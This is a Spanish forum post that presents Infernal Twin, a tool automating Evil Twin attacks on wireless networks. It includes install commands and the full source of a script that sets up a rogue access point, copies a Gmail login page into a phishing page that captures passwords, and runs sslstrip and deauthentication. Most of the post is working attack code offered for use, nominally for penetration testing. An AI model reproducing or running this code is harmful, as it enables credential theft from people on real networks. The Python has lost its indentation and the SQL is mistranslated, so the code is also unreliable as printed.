Bienvenido a Tecnohackers

Tecnohackers » Hacking y Seguridad » Hacking » Herramientas Hacking
 » 

Infernal Twin - Herramienta Para Hackear Redes Inalámbricas



Autor Tema: Infernal Twin - Herramienta Para Hackear Redes Inalámbricas  (Leído 3198 veces)

Desconectado zolo

  • Consigliere
  • Master
  • *****
  • Mensajes: 23049
  • Un Mes, Un Año o Toda Una Vida, Da Igual, Estare
Infernal Twin - Herramienta Para Hackear Redes Inalámbricas
« en: Noviembre 21, 2015, 08:07:45 am »
Herramienta automatizada diseñada para actividades de pruebas de penetración, se ha desarrollado para automatizar ataque Evil Twin.

¿ Que es el Evil Twin ?

Evil Twin (gemelo malvado), en seguridad, es un punto de acceso inalámbrico que se hace pasar por un punto de acceso Wi-Fi legítimo para que un atacante pueda recopilar información personal o corporativa sin el conocimiento del usuario final.

"La herramienta fue creada para ayudar a los auditores y pruebas de penetración para llevar a cabo la evaluación de la seguridad inalámbrica de una manera rápida y flexibilizar ataque complejos." Afirma Khalilov M, autor de la herramienta.

Tomando en cuenta, como suele suceder, que la herramienta de pruebas de penetración podría ser mal utilizada por hackers para llevar a cabo actividades ilícitas, así que es mejor presentarla y difundir el conocimiento sobre esta potencial arma en el arsenal de los atacantes.

El punto de acceso falso se utiliza para servir a los usuarios de la red páginas de acceso falsas para robar sus credenciales de conexión Wi-Fi y otros datos sensibles. El supuesto de ataque podría ser explotado para ejecutar ataques man-in-the-middle o para servir software malicioso a los equipos de la red de destino.

En primer lugar es necesario instalar todos los componentes necesarios para utilizar la herramienta, incluyendo el módulo de Apache, la base de datos mysql, la herramienta de manipulación de paquetes Scapy para redes informáticas y el framework de depuración wxtools.

Entonces tienes que instalar la utilidad Aircrack-ng y obtener el infernal-twin del repositorio.

Aircrack-ng es una suite de software de red que consiste en un detector, analizador de paquetes, WEP y WPA / WPA2-PSK cookies y análisis de herramientas para redes inalámbricas 802.11.

Instalación de componentes

Código: You are not allowed to view links. Register or Login
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server php5-mysql libapache2-mod-auth-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone [url]https://github.com/entropy1337/infernal-twin.git[/url]
$ cd infernal-twin

En este punto iniciamos la herramienta Infernal-Twin con privilegios de administrador . Algunos usuarios experimentaron problemas para conectarse a la base de datos, los usuarios @lightos proporcionaron la siguiente solución para solucionar el problema.

Crear un nuevo usuario en la base de datos y utilizarla para el lanzamiento de la herramienta siguiendo este procedimiento:

* Eliminar archivo dbconnect .conf de la carpeta inalámbrica Infernal
* Ejecute el siguiente comando desde la consola mysql.

Código: You are not allowed to view links. Register or Login
mysql> use mysql;
mysql> CREATE USER 'root2' @ 'localhost' IDENTIFICADO POR 'introducir la nueva contraseña aquí';
mysql> GRANT ALL PRIVILEGIOS EN \ * \ * A 'root2' @ 'localhost' WITH GRANT OPTION.;
 
* Trate de ejecutar la herramienta de nuevo.

Característcas

La herramienta Infernal-Twin implementa varias características, ofrece todo lo necesario para hackear una red Wi-Fi (WPA2, WEP) y permite ejecutar ataques fácilmente de Ingeniería Social Inalambrica. A continuación las principales características:

* Interfaz de Suite de evaluación de seguridad Wireless
* Hacking WPA2
* Hacking WEP
* Hacking WPA2 Enterprise
* Ingeniería Social Inalambrica
* SSL Strip
* Generación de informes PDF, HTML
* Función de toma de notas
* Los datos se guardan en la base de datos
* Mapeo de red
* MiTM
* Solicitudes de Prueba

Video Tutorial

En este video es que ilustra un ataque a una red pública, el script debe ser capaz de ir y modificar la página de inicio de sesión y modificar el contenido de la misma con las variables necesarias.

You are not allowed to view links. Register or Login


Otro vídeo tutorial sobre la herramienta Infernal-Twin.

You are not allowed to view links. Register or Login


Actualización

El autor de la herramienta Infernal-Twin piratería, Khalilov M, alias 3ntr0py (entropy1337), anunció que próximas versiones incluirán análisis de archivos de registro t-shark para recoger las credenciales de las víctimas y otros datos.

Verificación: 2015-11-07

Codigo Fuente

InfernalWireless.py

Código: You are not allowed to view links. Register or Login
import wx
#~ import infernal_wireless_gui_project
import os
import os.path
import MySQLdb
from datetime import datetime

os.system('/etc/init.d/apache2 start')
os.system('/etc/init.d/mysql start')

if os.path.exists('dbconnect.conf'):
print 'DB Config files is found'
else:
print 'Creating DB config file'
import db_connect_creds


dbfile = open('dbconnect.conf', 'r').readlines()

cxn = MySQLdb.connect('localhost',str(dbfile[0]).replace('\n',''),str(dbfile[1]).replace('\n',''))

date = datetime.now()


cxn.query('CREATE DATABASE IF NOT EXISTS InfernalWireless')

cxn.commit()
cxn.close()

#~ cxn = MySQLdb.connect(db='InfernalWireless')

cxn = MySQLdb.connect('localhost',str(dbfile[0]).replace('\n',''),str(dbfile[1]).replace('\n',''), db='InfernalWireless')

cur = cxn.cursor()

current_project_id = 0
#~ os.system("airmon-ng start wlan0")

def create_project_table():


##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT



#~ cur.execute("CREATE TABLE mytable (id AUTO_INCREMENT")

PROJECT_TITLE = '''CREATE TABLE IF NOT EXISTS Projects (ProjectId MEDIUMINT NOT NULL AUTO_INCREMENT, ProjectName TEXT, PRIMARY KEY (ProjectId), AuditorName TEXT, TargetName TEXT, date TEXT)'''


cur.execute(PROJECT_TITLE)
#~ print 'Project table is created'

#~ def create_report_table(self):
#~
#~ ##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT
#~
#~
#~ report_table = '''CREATE TABLE IF NOT EXISTS Reports (findingID MEDIUMINT NOT NULL AUTO_INCREMENT, finding_name TEXT, phase TEXT, PRIMARY KEY (findingID), risk_level TEXT, risk_category TEXT, Findings_detail TEXT, Notes TEXT, Project_fk_Id MEDIUMINT, FOREIGN KEY (Project_fk_Id) REFERENCES Projects (ProjectId))'''
#~ cur.execute(report_table)
    #~ print 'Report table is created'
#~

def create_report_table():


##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT



#~ cur.execute("CREATE TABLE mytable (id AUTO_INCREMENT")

report_table = '''CREATE TABLE IF NOT EXISTS Reports (findingID MEDIUMINT NOT NULL AUTO_INCREMENT, finding_name TEXT, phase TEXT, PRIMARY KEY (findingID), risk_level TEXT, risk_category TEXT, Findings_detail TEXT, Notes TEXT, Project_fk_Id MEDIUMINT, FOREIGN KEY (Project_fk_Id) REFERENCES Projects (ProjectId))'''


cur.execute(report_table)
#~ print 'Report table is created'
create_project_table()
create_report_table()


class Example(wx.Frame):



    def __init__(self, parent, title):
        super(Example, self).__init__(parent, title=title,
            size=(600, 400))

        #~ self.create_project_table()
        #~ self.create_report_table()
                   
        self.InitUI()
       

        self.Centre()
        self.Show()
             
   
    global MultiLine
    isProject = False     
    global projectName
    #~ self.projectIDNumber = 0
    def InitUI(self):


   
        panel = wx.Panel(self)
       
        self.quote = wx.StaticText(panel,-1, label="PROJECT DETAILS \n", pos=(10, 30))
        self.quote.SetForegroundColour((255,0,0)) # set text color
       
        #~ prjBtn = wx.Button(panel, -1, "Create a Project",size=(150,30), pos=(10,650))
        #~ prjBtn.Bind(wx.EVT_BUTTON, self.create_project)
       
       

        panel.SetBackgroundColour('#4f5049')
        #vbox = wx.BoxSizer(wx.VERTICAL)
       
       
        self.projectname = wx.TextCtrl(panel, -1, "Project Name",size=(250,30), pos=(10,120))
        #self.projectname.SetBackgroundColour('#ededed')
       
       
        self.author = wx.TextCtrl(panel, -1, "Author's Full Name'",size=(250,30), pos=(10,160))
        #self.author.SetBackgroundColour('#ededed')
       
        self.targetname = wx.TextCtrl(panel, -1, "Target Name",size=(250,30), pos=(10,200))
        #self.targetname.SetBackgroundColour('#ededed')
       
        self.datename = wx.TextCtrl(panel, -1, "dd/mm/yy",size=(250,30), pos=(10,240))
        #self.targetname.SetBackgroundColour('#ededed')       
       
        prjBtn = wx.Button(panel, -1, "Create a Project",size=(150,30), pos=(10,300))
       
        prjBtn.Bind(wx.EVT_BUTTON, self.create_project)
               
       
        prjBtn2 = wx.Button(panel, -1, "Stand alone",size=(150,30), pos=(10,350))
        prjBtn2.Bind(wx.EVT_BUTTON, self.create_std)
       
        #~ vbox.Add(self.MultiLine, -1,10)
        #~ vbox.Add(prjBtn,-1, border=10)
        #~ panel.SetSizer(vbox)



   
    def create_project_table(self):


##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT



#~ cur.execute("CREATE TABLE mytable (id AUTO_INCREMENT")

PROJECT_TITLE = '''CREATE TABLE IF NOT EXISTS Projects (ProjectId MEDIUMINT NOT NULL AUTO_INCREMENT, ProjectName TEXT, PRIMARY KEY (ProjectId), AuditorName TEXT, TargetName TEXT, date TEXT)'''


cur.execute(PROJECT_TITLE)
#~ print 'Project table is created'
   
#~ def create_report_table(self):
#~
#~ ##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT
#~
#~
#~ report_table = '''CREATE TABLE IF NOT EXISTS Reports (findingID MEDIUMINT NOT NULL AUTO_INCREMENT, finding_name TEXT, phase TEXT, PRIMARY KEY (findingID), risk_level TEXT, risk_category TEXT, Findings_detail TEXT, Notes TEXT, Project_fk_Id MEDIUMINT, FOREIGN KEY (Project_fk_Id) REFERENCES Projects (ProjectId))'''
#~ cur.execute(report_table)
    #~ print 'Report table is created'
    #~

    def create_report_table(self):


##############3333  THIS IS GOING TO CRAETE A TABLE FOR PROJECT



#~ cur.execute("CREATE TABLE mytable (id AUTO_INCREMENT")

report_table = '''CREATE TABLE IF NOT EXISTS Reports (findingID MEDIUMINT NOT NULL AUTO_INCREMENT, finding_name TEXT, phase TEXT, PRIMARY KEY (findingID), risk_level TEXT, risk_category TEXT, Findings_detail TEXT, Notes TEXT, Project_fk_Id MEDIUMINT, FOREIGN KEY (Project_fk_Id) REFERENCES Projects (ProjectId))'''


cur.execute(report_table)
#~ print 'Report table is created'




    def project_details(self, projectname, Authors_name, TargetName, date):

PROJECT_DETAILS = 'INSERT INTO Projects (ProjectName, AuditorName, TargetName, date) VALUES ("%s","%s","%s","%s")'%(projectname, Authors_name, TargetName, date)
cur.execute(PROJECT_DETAILS)
current_project_id_tmp = cur.lastrowid
current_project_id = current_project_id_tmp
#~ cur.close()
#~ cxn.commit()
#~ cxn.close()
#~ print "report is generated"
   
    def create_project(self, e):
isProject = True
#~ print isProject
self.projectName = self.projectname.GetValue()
#print self.projectName

dic_project = {"Project":str(self.projectName),"Authors Full Name":str(self.author.GetValue()),"Target name":str(self.targetname.GetValue()),"Date":str(self.datename.GetValue())}

os.system("mkdir %s"%str(self.projectName).replace(" ","_"))
dic_project['Filename']=str(self.projectName).replace(" ","_")

pFile = open(self.projectName.replace(" ","_")+"/Project Info.txt","wb")
pFile.write(str(dic_project))
pFile.close()



prID = self.project_details(str(self.projectName),str(self.author.GetValue()),str(self.targetname.GetValue()),str(self.datename.GetValue()))
cur.close()
cxn.commit()
cxn.close()

self.closeWindow(self)
infernal_wireless_gui_project.main()


    def closeWindow(self, event):
self.Destroy()




    def create_std(self, e):
isProject = False
#~ print isProject
#print self.projectName
self.closeWindow(self)
infernal_wireless_gui_project.main()

    def returnproject(self):
return self.projectName




#if __name__ == '__main__':

def create_new_project():


    app = wx.App()
   
    Example(None, title='Create A project')
   
    app.MainLoop()

   




if __name__ == '__main__':

import infernal_wireless_gui_project

create_new_project()
cur.close()
cxn.commit()
cxn.close()

evil_twin_version_finalv1.py

Código: You are not allowed to view links. Register or Login
from scapy.all import *
import os
import time
from subprocess import *
from bs4 import BeautifulSoup
print '*'*20
print '*'*20
print '''

'####:'##::: ##:'########:'########:'########::'##::: ##::::'###::::'##::::::::::'##:::::'##:'####:'########::'########:'##:::::::'########::'######:::'######::
. ##:: ###:: ##: ##.....:: ##.....:: ##.... ##: ###:: ##:::'## ##::: ##:::::::::: ##:'##: ##:. ##:: ##.... ##: ##.....:: ##::::::: ##.....::'##... ##:'##... ##:
: ##:: ####: ##: ##::::::: ##::::::: ##:::: ##: ####: ##::'##:. ##:: ##:::::::::: ##: ##: ##:: ##:: ##:::: ##: ##::::::: ##::::::: ##::::::: ##:::..:: ##:::..::
: ##:: ## ## ##: ######::: ######::: ########:: ## ## ##:'##:::. ##: ##:::::::::: ##: ##: ##:: ##:: ########:: ######::: ##::::::: ######:::. ######::. ######::
: ##:: ##. ####: ##...:::: ##...:::: ##.. ##::: ##. ####: #########: ##:::::::::: ##: ##: ##:: ##:: ##.. ##::: ##...:::: ##::::::: ##...:::::..... ##::..... ##:
: ##:: ##:. ###: ##::::::: ##::::::: ##::. ##:: ##:. ###: ##.... ##: ##:::::::::: ##: ##: ##:: ##:: ##::. ##:: ##::::::: ##::::::: ##:::::::'##::: ##:'##::: ##:
'####: ##::. ##: ##::::::: ########: ##:::. ##: ##::. ##: ##:::: ##: ########::::. ###. ###::'####: ##:::. ##: ########: ########: ########:. ######::. ######::
....::..::::..::..::::::::........::..:::::..::..::::..::..:::::..::........::::::...::...:::....::..:::::..::........::........::........:::......::::......:::
       

'''

import create_db_hotspot
import urllib2, httplib, redirecthandle

####### SET UP A MONITORING INTERFACE
print '*'*20
print 'Creating a monitoring interface'
output = Popen(["iwconfig"], stdout=PIPE).communicate()[0]
wireless_interface = ""
mon_iface = ""
if "wlan" in output:
#print "The network inteface is: " + output[0:5]
wireless_interface = output[0:6].strip()
print "\n\n"
print "EVIL TWIN ATTACK"
print "\n\n"
print "Using wireless interface:::" + wireless_interface
print "\n\n"


mon_interface = Popen(["airmon-ng", "start", wireless_interface], stdout=PIPE).communicate()[0]

if 'mon' in mon_interface:
print mon_interface[-33:-1].strip()
mon_iface = mon_interface[-7:-2].strip(")")

print '*'*20
print "SCANNING FOR WIRELESS NETWORKS"
print '*'*20

print "press Ctrl+C to stop scanning"

######## SCAN FOR SSID
app_list = []
def PacketHandler(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype==8:
if pkt.addr2 not in app_list:
app_list.append(pkt.addr2)
print "AP MAC: %s with SSID: %s " %(pkt.addr2, pkt.info)

sniff(iface=mon_iface, prn= PacketHandler)

time.sleep(3)
os.system('airmon-ng stop ' + mon_iface)
######## creating a necessary files;
print '*'*20
print "Making a backup of DHCPD and hostapd files"

#os.system("mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup")

# GET USER INPUT FOR SSID

SSID = raw_input('Enter the target SSID: ')
CHANNEL = raw_input('Enter the channel for SSID: ')
hostapd = open('/etc/hostapd/hostapd.conf', 'wb')
config_file = "interface="+wireless_interface+"\ndriver=nl80211\nssid="+SSID+"\nchannel=1\n#enable_karma=1\n"
hostapd.write(config_file)
hostapd.close()
os.system("service hostapd start")
print "service hostapd start started"

time.sleep(10)
os.system("""sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF""")

os.system("service dnsmasq start")

print "service dnsmasq start started"

time.sleep(2)

os.system("""ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24

iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward""")



##### creating a DHCPD script
#print '*'*20
#print "creating a DHCPD script"
#dhcpd_file = open("/etc/dhcp/dhcpd.conf", "wb")
#dhcpd_file.write("authoritative;\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.1.128 netmask 255.255.255.128 {\n\toption subnet-mask 192.168.1.128;\n\toption broadcast-address 192.168.1.255;\n\toption routers 192.168.1.129;\n\toption domain-name-servers 8.8.8.8;\n\trange 192.168.1.130 192.168.1.140;\n}")


#dhcpd_file.close()

################ CONNECT TO WIRELESS NETWORK #########
def connect_wireless():
os.system("iwconfig "+wireless_interface+" essid " + SSID)


#os.system("sudo iw dev "+wireless_interface+" disconnect")
print '*'*20
print 'Connected to :' + SSID + ' on interface ' + wireless_interface

time.sleep(5)


#######  HANDLE REDIRECT
def get_login_page():

httplib.HTTPConnection.debuglevel=1
request = urllib2.Request('[url]https://gmail.com[/url]')
opener = urllib2.build_opener(redirecthandle.SmartRedirectHandler())
f = opener.open(request)
##article = re.sub(r'(?is)</html>.+', '</html>', article)
redirect = f.url
##response = urllib2.urlopen('[url]https://google.com[/url]')
html = f.read()
print "Found the login page here: " + f.url
########## regex search and replace
regex = re.search(r'action="([^"]*)".*?', html)
post_action = str(regex.group(0))

print "*" * 20
print 'modifying the login page...'
new_login = html.replace(post_action, 'action=getcreds.php')
##### create a login page
index_page = open('/var/www/index.html','wb')
index_page.write(new_login)
index_page.close()

############# MOFIYING THE POST SCRIPT

myhtml = open('/var/www/index.html', 'r')

read_html = myhtml.read()

myhtml.close()

number = 0

html_proc = BeautifulSoup(read_html)

inputs =  html_proc.findAll('input')


for i in inputs:
print str(number) +": " +str(i)
number = number + 1

#username_select = input('Please choose the username or email ID in numeric representation: ')

user = str(raw_input('Please enter the username / email of the target script:')).strip()
password = str(raw_input('Please enter the password of the target script: ')).strip()

tmp = read_html.replace('name="'+user+'"','name="username"').replace('name="'+password+'"', 'name="password"')

new_page = open('/var/www/index.html', 'wb')
new_page.write(tmp)
new_page.close()

time.sleep(3)


########## CONNECTING TO THE WIRELESS NETWORK

def bring_internet_down():
os.system('ifconfig eth0 down')

def bring_internet_up():
os.system('ifconfig eth0 up')
os.system('dhclient eth0')
time.sleep(10)
os.system('ifconfig eth0')

############ bring internet down here ###########
#bring_internet_down()


#connect_wireless()

#print 'Please connected to following SSID from network manager: ' + SSID

#connect_command = str(raw_input('Once Connected enter 1'))


#while connect_command != 1:
# connect_command = str(raw_input('Please connected to target SSID to proceed the attack \n'))
# os.system('ifconfig ' + wireless_interface)
# break

######## getting login page



print '*'*20
print 'Getting login page'

get_login_page()

os.system('firefox http://localhost/index.html &')

######### bring internet up here

#bring_internet_up()


# CREATE A HOTSPOT IN A NEW TERMINAL
time.sleep(5)
print '*'*20
print 'setting up redirect NAT rule'

os.system("""iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE""")

time.sleep(10)

def sslstrip():
print "setting up SSLSTRIP NAT rule"
os.system("""iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT""")

os.system("gnome-terminal -x sslstrip -akf")

def deauthenticate_ssid():
os.system('aireplay-ng -0 10 -e ' + SSID)

#print "Creating a hotspot"
#os.system("gnome-terminal -x airbase-ng -e '"+SSID+"' -c "+str(CHANNEL)+" -P "+mon_iface+" &")

#internet_ip = raw_input('Enter the outbound IP address: ')

#print '*'*20
#print 'Setting up DHCP Server'
########### SETTING UP THE DHCPD SERVER
#~ os.system("ifconfig at0 up")
#~ os.system("ifconfig at0 192.168.1.129 netmask 255.255.255.128")
#~ os.system("route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129")
#~
#~
#~ ######### setting up a NAT
#~ print '*'*20
#~ print "setting up a NAT rules\n"
#~ os.system("iptables --flush")
#~ os.system("iptables --table nat --flush")
#~ os.system("iptables --delete-chain")
#~ os.system("iptables --table nat --delete-chain")
#~ os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
#~ os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
#~ os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
#~
#~
#~ os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination "+internet_ip+":80")
#~ os.system("iptables -t nat -A POSTROUTING -j MASQUERADE")
#~
#~
#~ ############# SETTING UP DHCP SERVER
#~ print '*'*20
#~ print 'Setting up DHCP Server for Client'
#~ print '*'*20
#~ time.sleep(3)
#~ os.system("/usr/sbin/dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0")
#~ time.sleep(3)
#~ os.system("/etc/init.d/isc-dhcp-server start")
#~
#~
#~ ########## CREATING AIRDUMP
#~ print "CREATING AIRDUMP\n"
#~ print '*'*20
#~ os.system("mkdir capture")
#~ os.system("gnome-terminal -x airodump-ng -c "+CHANNEL+" mon0 -w capture/"+SSID)

############# STOP MONITORING INTERFACE
#~ print '*'*20a
#~ cancel_command = str(raw_input('Enter quit() to exit the application\n'))
#~
#~
#~ while cancel_command != 'quit()':
#~ cancel_command = str(raw_input('Enter quit() to exit the application\n'))
#~ print '*'*20
#~ print 'Stopping the monitoring interface'
#~ os.system("airmon-ng stop " + mon_iface)
#~ os.system("ifconfig at0 down")


command = str(raw_input('Enter 1 for sslstrip\nEnter 2 for Deauthentication Request\nEnter 3 to Exit'))


while True:
if command == '1':
sslstrip()
command = str(raw_input('Enter 1 for sslstrip\nEnter 2 for Deauthentication Request\nEnter 3 to Exit'))
if command == '2':
command = str(raw_input('Enter 1 for sslstrip\nEnter 2 for Deauthentication Request\nEnter 3 to Exit'))
deauthenticate_ssid()
if command == '3':
command = str(raw_input('Enter 1 for sslstrip\nEnter 2 for Deauthentication Request\nEnter 3 to Exit'))
sys.exit()
 

You are not allowed to view links. Register or Login






 




You are not allowed to view links. Register or Login

Tags:
Tags:

 


SMF 2.0.19 | SMF © 2016, Simple Machines
Paginas Afiliadas
Twitter - FaceBook - Daraxblog
Designed by Smf Personal